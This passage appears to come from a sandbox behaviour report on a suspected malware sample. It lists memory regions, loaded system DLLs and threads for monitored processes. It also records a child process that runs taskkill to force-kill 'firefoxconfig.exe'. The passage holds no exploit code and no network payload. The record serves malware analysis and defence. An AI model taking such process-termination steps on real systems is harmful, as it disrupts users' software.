"private_0x000007fffffde000" filename = "" Region: id = 367 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 368 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 369 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 959 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 960 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 961 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 962 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 963 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 964 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 965 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 966 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 967 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 968 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 969 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 970 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 971 start_va = 0x3f0000 end_va = 0x577fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 972 start_va = 0x580000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 973 start_va = 0x710000 end_va = 0x1b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 974 start_va = 0x1b40000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 975 start_va = 0x1bc0000 end_va = 0x1c7ffff entry_point = 0x1bc0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 976 start_va = 0x1ce0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 977 start_va = 0x1da0000 end_va = 0x1e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 978 start_va = 0x1f50000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 979 start_va = 0x1fd0000 end_va = 0x229efff entry_point = 0x1fd0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 980 start_va = 0x2340000 end_va = 0x23bffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 981 start_va = 0x2450000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 982 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 983 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 984 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 985 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 986 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 987 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 988 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 989 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 990 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 991 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 992 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 993 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 994 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 995 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 996 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 997 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 998 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 999 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1000 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1001 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1002 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1003 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1004 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1005 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1006 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1007 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1008 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1009 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1010 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1011 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1012 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1013 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1014 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1015 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1016 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1017 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1018 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1019 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1020 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1021 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 16 os_tid = 0xa0c Thread: id = 89 os_tid = 0xad8 Thread: id = 104 os_tid = 0xb40 Thread: id = 111 os_tid = 0xb88 Thread: id = 112 os_tid = 0xb8c Process: id = "8" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x7acdd000" os_pid = "0xa28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM firefoxconfig.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 370 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 371 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 372 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 373 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 374 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 375 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 376 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 377 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 378 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 379 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 380 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 381 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 382 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 383 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 384 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1024 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1025 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1026 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1027 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1028 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1029 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1030 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1031 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1032 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1033 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1034 start_va = 0x3f0000 end_va = 0x577fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1035 start_va = 0x580000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1036 start_va = 0x710000 end_va = 0x1b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 1037 start_va = 0x1b70000 end_va = 0x1beffff entry_point = 0x0 region_type = private name = "private_0x0000000001b70000" filename = "" Region: id = 1038 start_va = 0x1bf0000 end_va = 0x1caffff entry_point = 0x1bf0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1039 start_va = 0x1cf0000 end_va = 0x1d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 1040 start_va = 0x1e10000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 1041 start_va = 0x1ef0000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 1042 start_va = 0x1f70000 end_va = 0x223efff entry_point = 0x1f70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1043 start_va = 0x2290000 end_va = 0x230ffff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 1044 start_va = 0x23d0000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1045 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1046 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1047 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1048 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1049 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1050 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1051 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1052 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1053 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1054 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1055 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1056 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1057 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1058 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1059 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1060 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1061 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1062 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1063 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1064 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1065 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1066 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1067 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1068 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1069 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1070 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1071 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1072 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1073 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1074 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1075 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1076 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1077 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1078 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1079 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1080 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1081 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1082 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1083 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = 